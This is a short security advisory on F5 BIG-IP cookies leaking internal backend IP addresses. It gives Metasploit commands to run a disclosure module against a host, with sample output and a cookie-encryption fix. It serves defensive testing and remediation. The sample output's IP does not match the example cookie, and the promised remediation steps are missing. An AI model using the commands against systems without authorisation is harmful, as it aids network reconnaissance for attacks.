F5 BIG-IP Cookie Remote Information Disclosure

F5 BIG-IP load balancers use cookies to multiplex traffic across backend servers. By default, these cookies include the IP address and port for which the client’s traffic should be directed to. When configured with internal servers, this behavior can expose internal IP addresses to untrusted users.

Example Cookie Format

Set-Cookie: BIGipServerEXAMPLE.COM-POOL=44332211.20480.0000; path=/; Httponly; Secure

At first glance, an internal IP is not visible, but can be extracted with a trivial encoding format.

Disclosing internal IP addresses can allow attackers to gain knowledge of the internal network and fine-tune future attacks. Such information is also useful as pretexts when performing social engineering attacks.

Exploiting F5 BIG-IP Cookie Disclosure

Metasploit has a module which can be used to quickly obtain the internal IP:

msf6 > use auxiliary/gather/f5_bigip_cookie_disclosure
msf6 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOST example.com
msf6 auxiliary(gather/f5_bigip_cookie_disclosure) > run

This should show the following output:

[*] Running module against example.com

[*] Starting request /
[+] F5 BIG-IP load balancing cookie "BIGipServerEXAMPLE.COM-POOL = 44332211.20480.0000" found
[+] Load balancing pool name "EXAMPLE.COM-POOL" found
[+] Backend 10.0.0.12:80 found
[*] Auxiliary module execution completed

Remediating F5 BIG-IP Cookie Remote Information Disclosure

F5 BIG-IP load balancers require these cookies to perform load balancing and cannot be removed. As a workaround, F5 BIG-IP products allow the cookies to be encrypted with a secret key. Encryption can be enabled from the management console by following the following steps.

The following F5 guidance is available to implement encrypted cookies: https://support.f5.com/csp/article/K6917